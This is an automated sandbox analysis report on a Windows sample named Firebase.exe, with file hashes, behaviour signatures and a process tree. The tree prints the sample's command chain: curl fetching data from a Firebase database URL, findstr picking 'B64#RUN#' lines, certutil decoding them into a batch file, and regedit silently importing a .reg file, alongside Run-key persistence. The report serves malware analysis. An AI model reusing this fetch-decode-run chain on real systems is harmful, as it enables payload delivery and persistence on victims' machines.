
Analysis

  • max time kernel
    19s
  • max time network
    20s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27/09/2024, 21:41

General

  • Target

    Firebase.exe

  • Size

    154KB

  • MD5

    90400f8a61086d340fb01e7d5149d49c

  • SHA1

    5e094cf298560e8951c87e9da09a8a6700796838

  • SHA256

    100120bd214342195f2605fd330370970095425a5a02dfd8a4f7b389e0ab428c

  • SHA512

    5760feed7757287c7d7591aad0612e345de8dd6c0861f0707928e7119462d96941fc368fe1110d8501755eb77993414a69a3456f2b4df56cf2dce71a104983fb

  • SSDEEP

    3072:2ahKyd2n3175GWp1icKAArDZz4N9GhbkrNEk1vT:2ahOzp0yN90QEM

Malware Config

Signatures

  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Deobfuscate/Decode Files or Information (1 TTP, 1 IoC)

    Payload decoded via CertUtil.

  • Runs .reg file with regedit (1 IoC)
  • Suspicious use of WriteProcessMemory (12 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Firebase.exe
    "C:\Users\Admin\AppData\Local\Temp\Firebase.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3496
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "Firebase.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\system32\curl.exe
        curl -s "https://scriptsdatabase-4effc-default-rtdb.firebaseio.com/Data.json"
        3⤵
        PID:1088
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo B64#RUN#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 "
        3⤵
        PID:1800
      • C:\Windows\system32\findstr.exe
        findstr /b "B64#RUN#"
        3⤵
        PID:3376
      • C:\Windows\system32\certutil.exe
        certutil -decode encoded.b64 decoded.bat
        3⤵
        • Deobfuscate/Decode Files or Information
        PID:4832
      • C:\Windows\regedit.exe
        regedit /s "HideShutdown.reg"
        3⤵
        • Runs .reg file with regedit
        PID:1908

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Firebase.bat

    Filesize

    2KB

    MD5

    a8ac75242f5f4e0cea3f1e1f32d61f29

    SHA1

    f6279838cd35263e0d96dc2b5720cff3c44792c6

    SHA256

    94ea0c470eb5a10a15adfa86c1c444dcd2fff82d20dca37ed5462d3a6156a26b

    SHA512

    43270edb11237647e87ba31c00b03443d5cbfb431c24569067156ac48dfdaeac81b614ed4f8e5ad9803fc9f2e40a6b2ff9304f2bdabb5acf9cf328942c02447f

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\HideShutdown.reg

    Filesize

    407B

    MD5

    ba4099bd7ed2d4b20a64a175ceaf8892

    SHA1

    c81486f544f95276c0ace9bbb5264266ecbf9e3c

    SHA256

    0fc71e0e5193447cdf77020bf61757bcd5a80e7889e5185c1a71915aa6fe3688

    SHA512

    5d1c11cdb680703462f4594cb498c6df615d0436440d3c83173f980451ae40e199f6b8f047d8079a2859bb7a646d9b0b8831fff0312ae365ed026d7d5011abad

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\decoded.bat

    Filesize

    594B

    MD5

    27f70714bc4710f8604f309d0eccf738

    SHA1

    c8f9c770a7d8fcfa7fc29c3ff36e530a4c723148

    SHA256

    5f09a711fbf2469e5849fec0aa0e6a0a95ed1899af7daf2ecfe2ec8bbf502dae

    SHA512

    cf4e50e2b8e0b45e0146937824b852297d8d48b34498bbfd53190ae4f0b9f0514b0248bb2f46ac3525c6270c39dbbf67af1ccd17a28aaa13ea45de74110bea81

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\encoded.b64

    Filesize

    794B

    MD5

    d70eaab3e1d8a7a15091039df76af539

    SHA1

    fa61ade14f1cb0c331d987b0640966b4af62d55d

    SHA256

    0c5fef1a855c2c350f8a6771302dfba9f1ccd9492c5651f436902a340e2f579c

    SHA512

    e430b44e266ca2bfee2d6b47d2627a2208053d4f1b07384a3528d82839467758db5f631e27be680b40b722153961ea4bda97ea8a2ec168cefe71f434df37c36b